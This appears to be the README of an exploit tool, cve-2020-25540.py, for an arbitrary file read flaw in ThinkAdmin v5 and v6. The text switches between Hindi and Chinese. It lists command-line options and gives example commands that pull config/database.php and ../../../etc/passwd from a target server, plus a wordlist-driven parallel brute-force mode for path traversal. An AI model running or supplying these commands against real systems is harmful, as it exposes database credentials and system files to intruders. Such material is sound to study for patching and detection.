
ThinkAdmin v5 v6 में मनमाना फ़ाइल पठन दोष एक्सप्लॉइट, कस्टम डिक्शनरी ब्रूट-फोर्स सक्षम।
यह स्क्रिप्ट ThinkAdmin v5, v6 संस्करणों में मनमानी फ़ाइल पढ़ने की कमजोरी का शोषण करने के लिए है।
==इंटरफ़ेस पथ विभिन्न संस्करणों में भिन्न हो सकते हैं (कुछ मूल ThinkAdmin से दूसरे संस्करण हैं)==
मूल उपयोग
usage: cve-2020-25540.py [-h] -t TARGET [-f FILE] [-w WORDLIST] [-b BASE_PATH]
[-p PARALLEL]
通过 API 读取文件并获取响应
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
目标 IP 地址或域名
-f FILE, --file FILE 要读取的文件路径
-w WORDLIST, --wordlist WORDLIST
字典文件路径,提供多个文件路径或文件名
-b BASE_PATH, --base-path BASE_PATH
基础路径,用于拼接字典文件中的路径
-p PARALLEL, --parallel PARALLEL
并行线程数
python3 cve-2020-25540.py -t "https://xxx.xx" -f "config/database.php"
python3 cve-2020-25540.py -t "https://xxx.xx" -f "../../../etc/passwd"
python3 cve-2020-25540.py -t "https://xxx.xx" -b "../../../etc/" -w wordlist.txt -p 10